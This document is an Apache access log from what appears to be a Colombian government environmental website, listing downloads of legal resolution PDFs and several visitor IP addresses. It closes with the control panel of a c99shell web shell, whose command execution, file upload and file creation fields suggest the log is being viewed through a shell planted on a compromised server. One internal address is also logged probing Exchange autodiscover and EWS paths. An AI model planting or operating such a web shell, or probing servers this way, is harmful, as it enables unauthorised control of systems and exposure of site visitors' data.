216.244.66.195 - - [31/Dec/2023:23:18:48 -0500] "GET /BLA/resoluciones/AUTOS%202019/0104.pdf HTTP/1.1" 200 335775
156.59.198.136 - - [31/Dec/2023:23:19:05 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3006.pdf HTTP/1.0" 200 388809
216.244.66.195 - - [31/Dec/2023:23:19:19 -0500] "GET /BLA/resoluciones/AUTOS%202019/0230.pdf HTTP/1.1" 200 256245
156.59.198.136 - - [31/Dec/2023:23:19:30 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/771.pdf HTTP/1.0" 200 407567
201.245.192.253 - - [31/Dec/2023:23:19:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36701
216.244.66.195 - - [31/Dec/2023:23:19:51 -0500] "GET /BLA/resoluciones/AUTOS%202019/0719.pdf HTTP/1.1" 200 283406
156.59.198.135 - - [31/Dec/2023:23:19:54 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5989.pdf HTTP/1.0" 200 408865
201.245.192.253 - - [31/Dec/2023:23:19:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36855
156.59.198.135 - - [31/Dec/2023:23:20:18 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/789.pdf HTTP/1.0" 200 396191
216.244.66.195 - - [31/Dec/2023:23:20:20 -0500] "GET /BLA/resoluciones/AUTOS%202019/0937.pdf HTTP/1.1" 200 289098
156.59.198.136 - - [31/Dec/2023:23:20:42 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/659.pdf HTTP/1.0" 200 1502744
216.244.66.195 - - [31/Dec/2023:23:20:49 -0500] "GET /BLA/resoluciones/AUTOS%202019/1112.pdf HTTP/1.1" 200 276837
172.22.2.4 - - [31/Dec/2023:23:19:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [31/Dec/2023:23:20:57 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [31/Dec/2023:23:21:07 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/26.pdf HTTP/1.0" 200 395773
216.244.66.195 - - [31/Dec/2023:23:21:17 -0500] "GET /BLA/resoluciones/AUTOS%202019/1113.pdf HTTP/1.1" 200 286712
156.59.198.135 - - [31/Dec/2023:23:21:32 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4917.pdf HTTP/1.0" 200 347780
172.22.2.4 - - [31/Dec/2023:23:20:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54423
216.244.66.195 - - [31/Dec/2023:23:21:45 -0500] "GET /BLA/resoluciones/AUTOS%202019/2267.pdf HTTP/1.1" 200 274813
156.59.198.136 - - [31/Dec/2023:23:21:56 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/64.pdf HTTP/1.0" 200 460344
40.77.167.132 - - [31/Dec/2023:23:22:02 -0500] "GET /BLA/resoluciones/AUTOS%202023/5912.pdf HTTP/1.1" 200 939958
216.244.66.195 - - [31/Dec/2023:23:22:10 -0500] "GET /BLA/resoluciones/AUTOS%202019/2276.pdf HTTP/1.1" 200 374819
156.59.198.135 - - [31/Dec/2023:23:22:20 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3471.pdf HTTP/1.0" 200 755742
201.245.192.253 - - [31/Dec/2023:23:22:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36178
156.59.198.135 - - [31/Dec/2023:23:22:43 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4346.pdf HTTP/1.0" 200 390159
156.59.198.135 - - [31/Dec/2023:23:23:08 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/766.pdf HTTP/1.0" 200 520785
156.59.198.136 - - [31/Dec/2023:23:23:33 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/748.pdf HTTP/1.0" 200 371570
156.59.198.136 - - [31/Dec/2023:23:23:57 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1348.pdf HTTP/1.0" 200 379434
156.59.198.135 - - [31/Dec/2023:23:24:21 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/429.pdf HTTP/1.0" 200 368657
156.59.198.136 - - [31/Dec/2023:23:24:46 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3526.pdf HTTP/1.0" 200 393723
156.59.198.136 - - [31/Dec/2023:23:25:10 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4860.pdf HTTP/1.0" 200 806136
156.59.198.136 - - [31/Dec/2023:23:25:35 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4730.pdf HTTP/1.0" 200 883346
201.245.192.253 - - [31/Dec/2023:23:25:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [31/Dec/2023:23:25:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36701
201.245.192.253 - - [31/Dec/2023:23:25:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36855
216.245.221.92 - - [31/Dec/2023:23:25:57 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [31/Dec/2023:23:25:59 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/983.pdf HTTP/1.0" 200 958150
156.59.198.135 - - [31/Dec/2023:23:26:23 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1988.pdf HTTP/1.0" 200 396748
40.77.167.254 - - [31/Dec/2023:23:26:24 -0500] "GET /BLA/resoluciones/AUTOS%202010/2180.pdf HTTP/1.1" 200 605842
172.22.2.4 - - [31/Dec/2023:23:25:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [31/Dec/2023:23:26:48 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5867.pdf HTTP/1.0" 200 422066
156.59.198.136 - - [31/Dec/2023:23:27:12 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4538.pdf HTTP/1.0" 200 365927
172.22.2.4 - - [31/Dec/2023:23:25:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58567
201.245.192.253 - - [31/Dec/2023:23:27:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36178
156.59.198.136 - - [31/Dec/2023:23:27:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/2010.pdf HTTP/1.0" 200 186023
156.59.198.136 - - [31/Dec/2023:23:28:01 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4103.pdf HTTP/1.0" 200 410880
156.59.198.136 - - [31/Dec/2023:23:28:25 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1495.pdf HTTP/1.0" 200 367258
156.59.198.136 - - [31/Dec/2023:23:28:50 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3325.pdf HTTP/1.0" 200 1311901
156.59.198.136 - - [31/Dec/2023:23:29:13 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1620.pdf HTTP/1.0" 200 384996
156.59.198.135 - - [31/Dec/2023:23:29:37 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2312.pdf HTTP/1.0" 200 425049
201.245.192.253 - - [31/Dec/2023:23:29:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36701
201.245.192.253 - - [31/Dec/2023:23:29:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36855
156.59.198.136 - - [31/Dec/2023:23:30:02 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2085.pdf HTTP/1.0" 200 509844
156.59.198.136 - - [31/Dec/2023:23:30:27 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1042.pdf HTTP/1.0" 200 921165
51.161.117.63 - - [31/Dec/2023:23:30:32 -0500] "GET /derechos-de-construccion-estrategia-del-distrito-para-adquirir-predios-privados-en-la-van-der-hammen-y-los-cerros-orientales.html HTTP/1.1" 200 912
156.59.198.135 - - [31/Dec/2023:23:30:50 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5955.pdf HTTP/1.0" 200 416694
40.77.167.254 - - [31/Dec/2023:23:30:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/2480.pdf HTTP/1.1" 200 394449
216.245.221.92 - - [31/Dec/2023:23:30:57 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [31/Dec/2023:23:31:14 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2842.pdf HTTP/1.0" 200 396946
52.167.144.217 - - [31/Dec/2023:23:31:31 -0500] "GET /BLA/resoluciones/AUTOS%202023/02985.pdf HTTP/1.1" 200 524054
156.59.198.136 - - [31/Dec/2023:23:31:39 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3066.pdf HTTP/1.0" 200 368101
216.244.66.195 - - [31/Dec/2023:23:31:55 -0500] "GET /robots.txt HTTP/1.1" 404 1018
156.59.198.135 - - [31/Dec/2023:23:32:04 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1932.pdf HTTP/1.0" 200 894131
156.59.198.136 - - [31/Dec/2023:23:32:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%202290%20DE%202006.PDF HTTP/1.0" 200 95840
172.22.2.4 - - [31/Dec/2023:23:30:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Dec/2023:23:32:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36178
156.59.198.136 - - [31/Dec/2023:23:32:51 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2831.pdf HTTP/1.0" 200 434586
156.59.198.135 - - [31/Dec/2023:23:33:15 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5999.pdf HTTP/1.0" 200 387993
172.22.2.4 - - [31/Dec/2023:23:31:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56873
156.59.198.136 - - [31/Dec/2023:23:33:39 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5866.pdf HTTP/1.0" 200 393871
156.59.198.136 - - [31/Dec/2023:23:34:05 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2138.pdf HTTP/1.0" 200 388956
52.167.144.217 - - [31/Dec/2023:23:34:23 -0500] "GET /BLA/resoluciones/AUTOS%202023/5881.pdf HTTP/1.1" 200 396936
156.59.198.136 - - [31/Dec/2023:23:34:29 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4420.pdf HTTP/1.0" 200 396753
172.22.2.4 - - [31/Dec/2023:23:32:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61309
156.59.198.136 - - [31/Dec/2023:23:34:53 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5051.pdf HTTP/1.0" 200 1956738
156.59.198.136 - - [31/Dec/2023:23:35:17 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3518.pdf HTTP/1.0" 200 405096
156.59.198.135 - - [31/Dec/2023:23:35:41 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2619.pdf HTTP/1.0" 200 1835795
201.245.192.253 - - [31/Dec/2023:23:35:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36701
201.245.192.253 - - [31/Dec/2023:23:35:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36855
216.245.221.92 - - [31/Dec/2023:23:35:57 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [31/Dec/2023:23:36:07 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2859.pdf HTTP/1.0" 200 1340936
156.59.198.136 - - [31/Dec/2023:23:36:31 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/726.pdf HTTP/1.0" 200 1124535
172.22.2.4 - - [31/Dec/2023:23:36:46 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
156.59.198.136 - - [31/Dec/2023:23:36:55 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1759.pdf HTTP/1.0" 200 458836
156.59.198.135 - - [31/Dec/2023:23:37:19 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/991.pdf HTTP/1.0" 200 1129586
201.245.192.253 - - [31/Dec/2023:23:37:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36178
156.59.198.135 - - [31/Dec/2023:23:37:43 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3858.pdf HTTP/1.0" 200 3240511
156.59.198.135 - - [31/Dec/2023:23:38:08 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/0485.pdf HTTP/1.0" 200 404793
172.22.2.4 - - [31/Dec/2023:23:36:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.136 - - [31/Dec/2023:23:38:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/1225.pdf HTTP/1.0" 200 56607
172.22.2.4 - - [31/Dec/2023:23:38:49 -0500] "GET /BLA/boletinlegal/Temporary_Listen_Addresses HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:50 -0500] "GET /BLA/boletinlegal/ews/exchanges/ HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:51 -0500] "GET /BLA/boletinlegal/ews/exchange%20/ HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:51 -0500] "GET /BLA/boletinlegal/ews/exchange/ HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:52 -0500] "GET /BLA/boletinlegal/ews/%20/ HTTP/1.1" 403 1020
172.22.2.4 - - [31/Dec/2023:23:38:53 -0500] "GET /BLA/boletinlegal/ews/ews/ HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:54 -0500] "GET /BLA/boletinlegal/ews/autodiscovers/ HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:54 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscovers/ HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:55 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover%20/ HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:56 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscoverrs/ HTTP/1.1" 404 1018
172.22.2.4 - - [31/Dec/2023:23:38:57 -0500] "GET /BLA/boletinlegal/autodiscove/ HTTP/1.1" 404 1018
156.59.198.136 - - [31/Dec/2023:23:38:57 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/769.pdf HTTP/1.0" 200 556661
172.22.2.4 - - [31/Dec/2023:23:37:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60046
156.59.198.136 - - [31/Dec/2023:23:39:20 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/03798.pdf HTTP/1.0" 200 9009056
156.59.198.135 - - [31/Dec/2023:23:39:46 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2090.pdf HTTP/1.0" 200 379039
201.245.192.253 - - [31/Dec/2023:23:39:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36701
201.245.192.253 - - [31/Dec/2023:23:39:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36855
156.59.198.136 - - [31/Dec/2023:23:40:09 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/731.pdf HTTP/1.0" 200 1681300
52.167.144.229 - - [31/Dec/2023:23:40:14 -0500] "GET /BLA/resoluciones/AUTOS%202023/5972.pdf HTTP/1.1" 200 426211
156.59.198.136 - - [31/Dec/2023:23:40:34 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1499.pdf HTTP/1.0" 200 420812
216.245.221.92 - - [31/Dec/2023:23:40:57 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [31/Dec/2023:23:40:58 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2830.pdf HTTP/1.0" 200 743266
156.59.198.136 - - [31/Dec/2023:23:41:22 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2276.pdf HTTP/1.0" 200 3954700
156.59.198.136 - - [31/Dec/2023:23:41:45 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5165.pdf HTTP/1.0" 200 383693
156.59.198.135 - - [31/Dec/2023:23:42:10 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5888.pdf HTTP/1.0" 200 407383
114.119.141.116 - - [31/Dec/2023:23:42:21 -0500] "GET /robots.txt HTTP/1.1" 404 1018
192.99.19.229 - - [31/Dec/2023:23:42:22 -0500] "GET /derechos-de-construccion-estrategia-del-distrito-para-adquirir-predios-privados-en-la-van-der-hammen-y-los-cerros-orientales.html HTTP/1.1" 200 912
201.245.192.253 - - [31/Dec/2023:23:42:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36178
156.59.198.135 - - [31/Dec/2023:23:42:34 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4438.pdf HTTP/1.0" 200 404113
156.59.198.136 - - [31/Dec/2023:23:42:58 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3775.pdf HTTP/1.0" 200 385539
156.59.198.135 - - [31/Dec/2023:23:43:23 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4365.pdf HTTP/1.0" 200 367592
40.77.167.76 - - [31/Dec/2023:23:43:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4058.pdf HTTP/1.1" 304 -
156.59.198.135 - - [31/Dec/2023:23:43:47 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5278.pdf HTTP/1.0" 200 366276
172.22.2.4 - - [31/Dec/2023:23:42:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.136 - - [31/Dec/2023:23:44:11 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3973.pdf HTTP/1.0" 200 1665137
207.46.13.64 - - [31/Dec/2023:23:44:32 -0500] "GET /zuma-propuesta-de-pot-una-herramienta-clave-para-seguir-mejorando-la-calidad-del-aire-de-bogota.html HTTP/1.1" 200 1029
156.59.198.136 - - [31/Dec/2023:23:44:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%20246%20DE%202006.PDF HTTP/1.0" 200 864201
156.59.198.136 - - [31/Dec/2023:23:44:59 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2749.pdf HTTP/1.0" 200 397171
172.22.2.4 - - [31/Dec/2023:23:43:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60910
156.59.198.136 - - [31/Dec/2023:23:45:24 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4927.pdf HTTP/1.0" 200 348948
173.252.127.11 - - [31/Dec/2023:23:45:39 -0500] "GET /secretaria-de-ambiente-reconocio-entidades-por-sus-buenas-practicas-ambientales.html HTTP/1.1" 200 892
156.59.198.135 - - [31/Dec/2023:23:45:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%20294%20DE%202006.PDF HTTP/1.0" 200 394083
216.245.221.92 - - [31/Dec/2023:23:45:57 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [31/Dec/2023:23:46:13 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4871.pdf HTTP/1.0" 200 342236
156.59.198.136 - - [31/Dec/2023:23:46:37 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4465.pdf HTTP/1.0" 200 395572
156.59.198.135 - - [31/Dec/2023:23:47:02 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1562.pdf HTTP/1.0" 200 391097
156.59.198.136 - - [31/Dec/2023:23:47:27 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4113.pdf HTTP/1.0" 200 389386
201.245.192.253 - - [31/Dec/2023:23:47:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36178
156.59.198.136 - - [31/Dec/2023:23:47:51 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5820.pdf HTTP/1.0" 200 366269
156.59.198.136 - - [31/Dec/2023:23:48:15 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5914.pdf HTTP/1.0" 200 899342
156.59.198.135 - - [31/Dec/2023:23:48:40 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1547.pdf HTTP/1.0" 200 441681
156.59.198.135 - - [31/Dec/2023:23:49:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%201993%20DE%202006.PDF HTTP/1.0" 200 9947
156.59.198.136 - - [31/Dec/2023:23:49:28 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1701.pdf HTTP/1.0" 200 382903
156.59.198.135 - - [31/Dec/2023:23:49:54 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/120.pdf HTTP/1.0" 200 1666748
172.22.2.4 - - [31/Dec/2023:23:48:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.19 - - [31/Dec/2023:23:50:07 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.19 - - [31/Dec/2023:23:50:07 -0500] "GET /Publicaciones/2023EE241551.pdf HTTP/1.1" 404 228
156.59.198.135 - - [31/Dec/2023:23:50:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%20888%20DE%202006.PDF HTTP/1.0" 200 35083
156.59.198.136 - - [31/Dec/2023:23:50:41 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/4896.pdf HTTP/1.0" 200 338483
172.22.2.4 - - [31/Dec/2023:23:49:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60502
216.245.221.92 - - [31/Dec/2023:23:50:57 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [31/Dec/2023:23:51:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%201807%20DE%202006.PDF HTTP/1.0" 200 38033
156.59.198.135 - - [31/Dec/2023:23:51:29 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3091.pdf HTTP/1.0" 200 1056467
156.59.198.136 - - [31/Dec/2023:23:51:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%20760%20DE%202006.PDF HTTP/1.0" 200 61285
66.249.77.67 - - [31/Dec/2023:23:52:18 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.77.67 - - [31/Dec/2023:23:52:18 -0500] "GET /proyecto-avantia-con-la-union-europea-busca-especialista-en-cambio-climatico.html HTTP/1.1" 304 -
156.59.198.136 - - [31/Dec/2023:23:52:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%202201%20DE%202006.PDF HTTP/1.0" 200 198020
201.245.192.253 - - [31/Dec/2023:23:52:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36178
156.59.198.135 - - [31/Dec/2023:23:52:42 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1754.pdf HTTP/1.0" 200 379664
156.59.198.136 - - [31/Dec/2023:23:53:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/1053.pdf HTTP/1.0" 200 106101
156.59.198.135 - - [31/Dec/2023:23:53:31 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5169.pdf HTTP/1.0" 200 511885
156.59.198.136 - - [31/Dec/2023:23:53:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RESOLUCION%201053%20DE%202002.pdf HTTP/1.0" 200 147090
156.59.198.136 - - [31/Dec/2023:23:54:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%202580%20DE%202006.PDF HTTP/1.0" 200 17762
156.59.198.136 - - [31/Dec/2023:23:54:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/1308.pdf HTTP/1.0" 200 156465
156.59.198.136 - - [31/Dec/2023:23:55:09 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/704.pdf HTTP/1.0" 200 366193
156.59.198.135 - - [31/Dec/2023:23:55:33 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1475.pdf HTTP/1.0" 200 390592
172.22.2.4 - - [31/Dec/2023:23:54:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [31/Dec/2023:23:55:57 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [31/Dec/2023:23:55:58 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3204.pdf HTTP/1.0" 200 1034502
156.59.198.135 - - [31/Dec/2023:23:56:22 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2765.pdf HTTP/1.0" 200 390131
172.22.2.4 - - [31/Dec/2023:23:55:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58567
156.59.198.136 - - [31/Dec/2023:23:56:47 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2936.pdf HTTP/1.0" 200 392709
156.59.198.136 - - [31/Dec/2023:23:57:11 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/542.pdf HTTP/1.0" 200 448671
201.245.192.253 - - [31/Dec/2023:23:57:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36178
156.59.198.136 - - [31/Dec/2023:23:57:35 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2775.pdf HTTP/1.0" 200 2618769
156.59.198.136 - - [31/Dec/2023:23:57:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RESOLUCION%20182%20DE%202006.PDF HTTP/1.0" 200 236885
156.59.198.136 - - [31/Dec/2023:23:58:25 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1286.pdf HTTP/1.0" 200 1019907
156.59.198.135 - - [31/Dec/2023:23:58:48 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/48.pdf HTTP/1.0" 200 397946
156.59.198.135 - - [31/Dec/2023:23:59:13 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/685.pdf HTTP/1.0" 200 417780
156.59.198.135 - - [31/Dec/2023:23:59:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/0271.pdf HTTP/1.0" 200 461531

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.1092 ]--